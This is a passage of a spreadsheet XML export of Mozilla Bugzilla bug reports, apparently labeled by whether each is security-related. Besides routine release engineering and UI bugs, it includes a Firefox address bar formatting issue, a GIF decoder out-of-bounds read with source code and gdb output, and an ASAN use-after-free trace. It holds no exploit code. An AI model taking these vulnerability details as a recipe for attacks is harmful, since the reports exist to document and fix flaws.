          <t>setup mw32-ix-slave02, mw32-ix-slave20, w32-ix-slave03, w32-ix-slave23, w32-ix-slave26, w32-ix-slave29, w32-ix-slave34 and w32-ix-slave41</t>
        </is>
      </c>
      <c r="D1989" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1989" t="n">
        <v>1</v>
      </c>
      <c r="F1989" t="n">
        <v>1</v>
      </c>
      <c r="G1989" t="n">
        <v>5</v>
      </c>
      <c r="H1989" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1989" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1989" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1989" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1989" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1989" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N1989" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1989" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1989" t="inlineStr"/>
      <c r="Q1989" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1989" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1989" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1989" t="n">
        <v>1</v>
      </c>
      <c r="U1989" t="n">
        <v>0</v>
      </c>
      <c r="V1989" t="n">
        <v>13</v>
      </c>
      <c r="W1989" t="inlineStr">
        <is>
          <t>These got reimaged:
mw32-ix-slave02.build.mtv1
w32-ix-slave03.build.scl1
w32-ix-slave23.build.scl1
w32-ix-slave26.build.scl1 
w32-ix-slave29.build.scl1
w32-ix-slave41.build.scl1</t>
        </is>
      </c>
      <c r="X1989" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1990">
      <c r="A1990" t="n">
        <v>1842766</v>
      </c>
      <c r="B1990" t="inlineStr">
        <is>
          <t>2023-07-11 02:29:32 -0700</t>
        </is>
      </c>
      <c r="C1990" t="inlineStr">
        <is>
          <t>Persisted search terms get formatted as URL</t>
        </is>
      </c>
      <c r="D1990" t="inlineStr">
        <is>
          <t>2024-01-04 01:12:23 -0800</t>
        </is>
      </c>
      <c r="E1990" t="n">
        <v>1</v>
      </c>
      <c r="F1990" t="n">
        <v>1</v>
      </c>
      <c r="G1990" t="n">
        <v>2</v>
      </c>
      <c r="H1990" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1990" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1990" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K1990" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1990" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1990" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1990" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1990" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1990" t="inlineStr">
        <is>
          <t>[sng-security] [adv-main117+]</t>
        </is>
      </c>
      <c r="Q1990" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1990" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1990" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T1990" t="n">
        <v>1</v>
      </c>
      <c r="U1990" t="n">
        <v>0</v>
      </c>
      <c r="V1990" t="n">
        <v>13</v>
      </c>
      <c r="W1990" t="inlineStr">
        <is>
          <t>Created attachment 9343232
Screenshot_20230711_111307.png
To reproduce:
1. Set DuckDuckGo as the default search engine
2. Search anything on DuckDuckGo
3. On the same page, enter `https://addons.mozilla.org/en-US/firefox/` in the search box **on the site** and press enter
Expected Result: It is clear to the user that the content of the address bar is a search term, not the current URL.
Actual Result: The search term is being formatted as if it were a URL  (see screenshot).
I don't think that this is that big of a big problem security-wise, because the search engine has to be the default and the page has to be loaded by the user entering a search term directly in Firefox. But if a malicious search engine could gain access to being set as the default, it could possibly abuse this, since it seems to me that the site itself can set the search query on its own once the page is loaded by a user search query.
A possible solution could be to remove the formatting from the address bar if it contains a search term, or, going one step further, also displaying an icon, like a magnifying glass, before the text, indicating that it is a search term.</t>
        </is>
      </c>
      <c r="X1990" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1991">
      <c r="A1991" t="n">
        <v>431730</v>
      </c>
      <c r="B1991" t="inlineStr">
        <is>
          <t>2008-05-01 12:47:05 -0700</t>
        </is>
      </c>
      <c r="C1991" t="inlineStr">
        <is>
          <t>Bugs with resolution MOVED cannot be edited anymore</t>
        </is>
      </c>
      <c r="D1991" t="inlineStr">
        <is>
          <t>2008-05-02 00:36:38 -0700</t>
        </is>
      </c>
      <c r="E1991" t="n">
        <v>1</v>
      </c>
      <c r="F1991" t="n">
        <v>1</v>
      </c>
      <c r="G1991" t="n">
        <v>4</v>
      </c>
      <c r="H1991" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1991" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1991" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1991" t="inlineStr">
        <is>
          <t>3.1.3</t>
        </is>
      </c>
      <c r="L1991" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1991" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1991" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1991" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1991" t="inlineStr"/>
      <c r="Q1991" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1991" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1991" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1991" t="n">
        <v>1</v>
      </c>
      <c r="U1991" t="n">
        <v>0</v>
      </c>
      <c r="V1991" t="n">
        <v>5</v>
      </c>
      <c r="W1991" t="inlineStr">
        <is>
          <t>Go visit a bug with resolution MOVED. Do no change and click "Commit". An error is thrown:
  You cannot set the resolution of a bug to MOVED without moving the bug.
This means I cannot comment, CC myself, etc... on such bugs. Pretty annoying!</t>
        </is>
      </c>
      <c r="X1991" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1992">
      <c r="A1992" t="n">
        <v>514776</v>
      </c>
      <c r="B1992" t="inlineStr">
        <is>
          <t>2009-09-04 15:11:27 -0700</t>
        </is>
      </c>
      <c r="C1992" t="inlineStr">
        <is>
          <t>GIF with out-of-bounds colormap reference causes OOB read in nsGIFDecoder2::OutputRow</t>
        </is>
      </c>
      <c r="D1992" t="inlineStr">
        <is>
          <t>2009-11-09 19:00:16 -0800</t>
        </is>
      </c>
      <c r="E1992" t="n">
        <v>1</v>
      </c>
      <c r="F1992" t="n">
        <v>1</v>
      </c>
      <c r="G1992" t="n">
        <v>3</v>
      </c>
      <c r="H1992" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1992" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1992" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1992" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1992" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1992" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1992" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1992" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1992" t="inlineStr">
        <is>
          <t>[sg:low] OOB memory read</t>
        </is>
      </c>
      <c r="Q1992" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1992" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1992" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T1992" t="n">
        <v>1</v>
      </c>
      <c r="U1992" t="n">
        <v>0</v>
      </c>
      <c r="V1992" t="n">
        <v>32</v>
      </c>
      <c r="W1992" t="inlineStr">
        <is>
          <t>Created attachment 398772
file that exposes bug
Build Identifier: mozilla-central revision 91096486c92c
If a GIF image block header specifies a small local color map, the decoder can be made to read off the end of the allocated color map if the image has pixels with color indices greater than the size of the map.
The code in question is:
(line 493 is the important one)
nsGIFDecoder2.cpp:
nsGIFDecoder2::OutputRow():
484:    // Row to process
485:    const PRUint32 bpr = sizeof(PRUint32) * mGIFStruct.width; 
486:    PRUint8 *rowp = mImageData + (mGIFStruct.irow * bpr);
487:
488:    // Convert color indices to Cairo pixels
489:    PRUint8 *from = rowp + mGIFStruct.width;
490:    PRUint32 *to = ((PRUint32*)rowp) + mGIFStruct.width;
491:    PRUint32 *cmap = mColormap;
492:    for (PRUint32 c = mGIFStruct.width; c &gt; 0; c--) {
493:      *--to = cmap[*--from];
494:    }
(where mColormap will be allocated in nsGIFDecoder2::GifWrite:
1097:      if (q[8] &amp; 0x80) /* has a local colormap? */
1098:      {
1099:        mGIFStruct.local_colormap_size = 1 &lt;&lt; depth;
1100:        if (!mGIFStruct.images_decoded) {
1101:          // First frame has local colormap, allocate space for it
1102:          // as the image frame doesn't have its own palette
1103:          mColormapSize = sizeof(PRUint32) &lt;&lt; realDepth;
1104:          if (!mGIFStruct.local_colormap) {
1105:            mGIFStruct.local_colormap = 
                  (PRUint32*)PR_MALLOC(mColormapSize);
1106:            if (!mGIFStruct.local_colormap) {
1107:              mGIFStruct.state = gif_oom;
1108:              break;
1109:            }
1110:          }
1111:          mColormap = mGIFStruct.local_colormap;
1112:        }
             ...
As evidence that this actually happens:
(gdb) print mGIFStruct.local_colormap_size
$26 = 64
(gdb) print /d *from
$27 = 206
(the code is trying to look at element 206 of an array only 64 elements long)
I believe that this is a limited size read-only bug that has minimal security implications, and therefore I am not marking this as security-sensitive.</t>
        </is>
      </c>
      <c r="X1992" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1993">
      <c r="A1993" t="n">
        <v>1374717</v>
      </c>
      <c r="B1993" t="inlineStr">
        <is>
          <t>2017-06-20 10:18:15 -0700</t>
        </is>
      </c>
      <c r="C1993" t="inlineStr">
        <is>
          <t>"Open default browser settings" in onboarding does nothing</t>
        </is>
      </c>
      <c r="D1993" t="inlineStr">
        <is>
          <t>2017-08-11 12:19:53 -0700</t>
        </is>
      </c>
      <c r="E1993" t="n">
        <v>1</v>
      </c>
      <c r="F1993" t="n">
        <v>1</v>
      </c>
      <c r="G1993" t="n">
        <v>2</v>
      </c>
      <c r="H1993" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1993" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1993" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K1993" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1993" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1993" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1993" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1993" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1993" t="inlineStr">
        <is>
          <t>[photon-onboarding]</t>
        </is>
      </c>
      <c r="Q1993" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1993" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1993" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T1993" t="n">
        <v>1</v>
      </c>
      <c r="U1993" t="n">
        <v>0</v>
      </c>
      <c r="V1993" t="n">
        <v>39</v>
      </c>
      <c r="W1993" t="inlineStr">
        <is>
          <t>Running latest nightly on macOS. 
Other buttons like "Show private browsing in menu" work, only this one does not.
http://imgur.com/a/kCG9a</t>
        </is>
      </c>
      <c r="X1993" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1994">
      <c r="A1994" t="n">
        <v>575159</v>
      </c>
      <c r="B1994" t="inlineStr">
        <is>
          <t>2010-06-27 20:39:04 -0700</t>
        </is>
      </c>
      <c r="C1994" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Firefox 3.6.6 to bouncer</t>
        </is>
      </c>
      <c r="D1994" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1994" t="n">
        <v>1</v>
      </c>
      <c r="F1994" t="n">
        <v>1</v>
      </c>
      <c r="G1994" t="n">
        <v>5</v>
      </c>
      <c r="H1994" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1994" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1994" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1994" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1994" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N1994" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1994" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1994" t="inlineStr"/>
      <c r="Q1994" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1994" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1994" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1994" t="n">
        <v>1</v>
      </c>
      <c r="U1994" t="n">
        <v>0</v>
      </c>
      <c r="V1994" t="n">
        <v>2</v>
      </c>
      <c r="W1994" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #573962 +++
Firefox 3.6.6
solaris-sparc:
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.6.4 to 3.6.6):
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.4-3.6.6.en-US.solaris-10-fcs-sparc.partial.mar
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.4-3.6.6.en-US.solaris-10-fcs-i386.partial.mar
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.4-3.6.6.en-US.opensolaris-sparc.partial.mar
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.4-3.6.6.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.6.6:
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.solaris-10-fcs-sparc.complete.mar
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.solaris-10-fcs-i386.complete.mar
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.opensolaris-sparc.complete.mar
/firefox/releases/3.6.6/contrib/solaris_tarball/firefox-3.6.6.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X1994" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1995">
      <c r="A1995" t="n">
        <v>596835</v>
      </c>
      <c r="B1995" t="inlineStr">
        <is>
          <t>2010-09-15 18:32:07 -0700</t>
        </is>
      </c>
      <c r="C1995" t="inlineStr">
        <is>
          <t>improvements to usability of try_sendchange.py</t>
        </is>
      </c>
      <c r="D1995" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1995" t="n">
        <v>1</v>
      </c>
      <c r="F1995" t="n">
        <v>1</v>
      </c>
      <c r="G1995" t="n">
        <v>5</v>
      </c>
      <c r="H1995" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1995" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1995" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1995" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1995" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1995" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1995" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1995" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1995" t="inlineStr"/>
      <c r="Q1995" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1995" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1995" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1995" t="n">
        <v>1</v>
      </c>
      <c r="U1995" t="n">
        <v>0</v>
      </c>
      <c r="V1995" t="n">
        <v>4</v>
      </c>
      <c r="W1995" t="inlineStr">
        <is>
          <t>Created attachment 475729
v1: improvement to try_sendchange
Looking to make sure that this script is more useful and informative to buildduty person. 
I've added the ability to do a dry-run with -n that will just print out what will be done as sendchanges.  
Also added a bit more output about what the ftp dir scanning turns up to help with troubleshooting your request from a developer.</t>
        </is>
      </c>
      <c r="X1995" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1996">
      <c r="A1996" t="n">
        <v>1026037</v>
      </c>
      <c r="B1996" t="inlineStr">
        <is>
          <t>2014-06-16 11:05:47 -0700</t>
        </is>
      </c>
      <c r="C1996" t="inlineStr">
        <is>
          <t>UAF of cc_call_info_t_</t>
        </is>
      </c>
      <c r="D1996" t="inlineStr">
        <is>
          <t>2016-06-04 16:00:55 -0700</t>
        </is>
      </c>
      <c r="E1996" t="n">
        <v>1</v>
      </c>
      <c r="F1996" t="n">
        <v>1</v>
      </c>
      <c r="G1996" t="n">
        <v>3</v>
      </c>
      <c r="H1996" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1996" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1996" t="inlineStr">
        <is>
          <t>WebRTC: Signaling</t>
        </is>
      </c>
      <c r="K1996" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1996" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1996" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1996" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1996" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1996" t="inlineStr">
        <is>
          <t>[adv-main34+]</t>
        </is>
      </c>
      <c r="Q1996" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1996" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1996" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T1996" t="n">
        <v>1</v>
      </c>
      <c r="U1996" t="n">
        <v>0</v>
      </c>
      <c r="V1996" t="n">
        <v>11</v>
      </c>
      <c r="W1996" t="inlineStr">
        <is>
          <t>Just saw an ASAN crash on my linux box:
    #0 0x786ada in strlib_is_string /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/src-common/string_lib.c:330
    #1 0x7869ec in strlib_copy /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/src-common/string_lib.c:95
    #2 0x5b2908 in calllogger_copy_call_log /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/call_logger.c:33
    #3 0x5d43c2 in getDeepCopyOfSessionData /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccprovider.c:1078
    #4 0x5bae87 in CCAPI_Call_getCallInfo /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccapi_call.c:30
    #5 0x5c7c58 in ccsnap_gen_callEvent /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccapi_snapshot.c:438
    #6 0x5d1ce8 in ccappUpdateSessionData /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccprovider.c:1633
    #7 0x5cb7c9 in ccp_handler /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccprovider.c:2026
    #8 0x5cae08 in CCApp_task /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccapp_task.c:184
    #9 0x43f293 in __asan::AsanThread::ThreadStart(unsigned long) (/home/bcampen/checkouts/mozilla-central/objdir-ff-asan/dist/cppunittests/signaling_unittests+0x43f293)
    #10 0x3620807f32 in start_thread (/lib64/libpthread.so.0+0x3620807f32)
    #11 0x36204f4eac in __clone (/lib64/libc.so.6+0x36204f4eac)
0x6040000a7f6c is located 28 bytes inside of 37-byte region [0x6040000a7f50,0x6040000a7f75)
freed by thread T0 here:
    #0 0x438c14 in __interceptor_free (/home/bcampen/checkouts/mozilla-central/objdir-ff-asan/dist/cppunittests/signaling_unittests+0x438c14)
    #1 0x5b2c79 in calllogger_free_call_log /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/call_logger.c:50
    #2 0x5bafcf in CCAPI_Call_releaseCallInfo /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccapi_call.c:60
    #3 0x597151 in CSF::CC_SIPCCCallInfo::~CC_SIPCCCallInfo() /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../media/webrtc/signaling/src/softphonewrapper/CC_SIPCCCallInfo.cpp:33
    #4 0x597103 in CSF::CC_SIPCCCallInfo::~CC_SIPCCCallInfo() /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../media/webrtc/signaling/src/softphonewrapper/CC_SIPCCCallInfo.cpp:32
    #5 0x529cd2 in CSF::CC_CallInfo::Release() /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../media/webrtc/signaling/include/CC_CallInfo.h:32
    #6 0x576e1f in ~nsRefPtr /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../xpcom/base/nsAutoPtr.h:870
    #7 0x576e1f in ~nsRefPtr /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../xpcom/base/nsAutoPtr.h:868
    #8 0x576e1f in ~runnable_args_nm_3 /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../media/mtransport/runnable_utils_generated.h:235
    #9 0x576e1f in ~runnable_args_nm_3 /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../media/mtransport/runnable_utils_generated.h:235
    #10 0x576e1f in mozilla::runnable_args_nm_3&lt;void (*)(nsAutoPtr&lt;std::string&gt;, ccapi_call_event_e, nsRefPtr&lt;CSF::CC_CallInfo&gt;), nsAutoPtr&lt;std::string&gt;, ccapi_call_event_e, nsRefPtr&lt;CSF::CC_CallInfo&gt; &gt;::~runnable_args_nm_3() /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_ecc/../../../../../media/mtransport/runnable_utils_generated.h:235
    #11 0x1985124 in nsRunnable::Release() /home/bcampen/checkouts/latest-central/objdir-ff-asan/xpcom/glue/../../../xpcom/glue/nsThreadUtils.cpp:32
    #12 0x2b9130127040 in ~nsCOMPtr /home/bcampen/checkouts/mozilla-central/objdir-ff-asan/xpcom/threads/../../dist/include/nsCOMPtr.h:535
    #13 0x2b9130127040 in nsThread::ProcessNextEvent(bool, bool*) /home/bcampen/checkouts/mozilla-central/objdir-ff-asan/xpcom/threads/../../../xpcom/threads/nsThread.cpp:772
    #14 0x1986b0a in NS_ProcessNextEvent(nsIThread*, bool) /home/bcampen/checkouts/latest-central/objdir-ff-asan/xpcom/glue/../../../xpcom/glue/nsThreadUtils.cpp:263
    #15 0x486d67 in main /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signaling/test/../../../../../media/webrtc/signaling/test/signaling_unittests.cpp:4384
    #16 0x3620421d64 in __libc_start_main (/lib64/libc.so.6+0x3620421d64)
previously allocated by thread T14 here:
    #0 0x438cf4 in __interceptor_malloc (/home/bcampen/checkouts/mozilla-central/objdir-ff-asan/dist/cppunittests/signaling_unittests+0x438cf4)
    #1 0x2b913c3d63f2 in moz_xmalloc /home/bcampen/checkouts/latest-central/objdir-ff-asan/memory/mozalloc/../../../memory/mozalloc/mozalloc.cpp:52
    #2 0x786876 in strlib_malloc /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/src-common/string_lib.c:53
    #3 0x786b2e in strlib_update /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/src-common/string_lib.c:155
    #4 0x5b3943 in handlePlacedCall /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/call_logger.c:182
    #5 0x5d2458 in ccappUpdateSessionData /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccprovider.c:1721
    #6 0x5cb7c9 in ccp_handler /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccprovider.c:2026
    #7 0x5cae08 in CCApp_task /home/bcampen/checkouts/latest-central/objdir-ff-asan/media/webrtc/signalingtest/signaling_sipcc/../../../../../media/webrtc/signaling/src/sipcc/core/ccapp/ccapp_task.c:184
    #8 0x43f293 in __asan::AsanThread::ThreadStart(unsigned long) (/home/bcampen/checkouts/mozilla-central/objdir-ff-asan/dist/cppunittests/signaling_unittests+0x43f293)
   It seems that we have both main and sipcc's CCApp task touching the same data. main can destroy one of these when a CSF::CC_CallInfoPtr goes out of scope (this is essentially a nsRefPtr&lt;CC_CallInfo&gt;, which points at an instance of CC_SIPCCCallInfo, which contains a cc_callinfo_ref_t that it will release). CCApp task can also free these. Neither the refcount nor the container are threadsafe.</t>
        </is>
      </c>
      <c r="X1996" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1997">
      <c r="A1997" t="n">
        <v>1436347</v>
      </c>
      <c r="B1997" t="inlineStr">
        <is>
          <t>2018-02-07 05:48:29 -0800</t>
        </is>
      </c>
      <c r="C1997" t="inlineStr">
        <is>
          <t>Move first PlacesUtils and PlacesBackups use farther in the startup test</t>
        </is>
      </c>
      <c r="D1997" t="inlineStr">
        <is>
          <t>2018-02-07 14:09:07 -0800</t>
        </is>
      </c>
      <c r="E1997" t="n">
        <v>1</v>
      </c>
      <c r="F1997" t="n">
        <v>1</v>
      </c>
      <c r="G1997" t="n">
        <v>2</v>
      </c>
      <c r="H1997" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1997" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1997" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K1997" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L1997" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1997" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
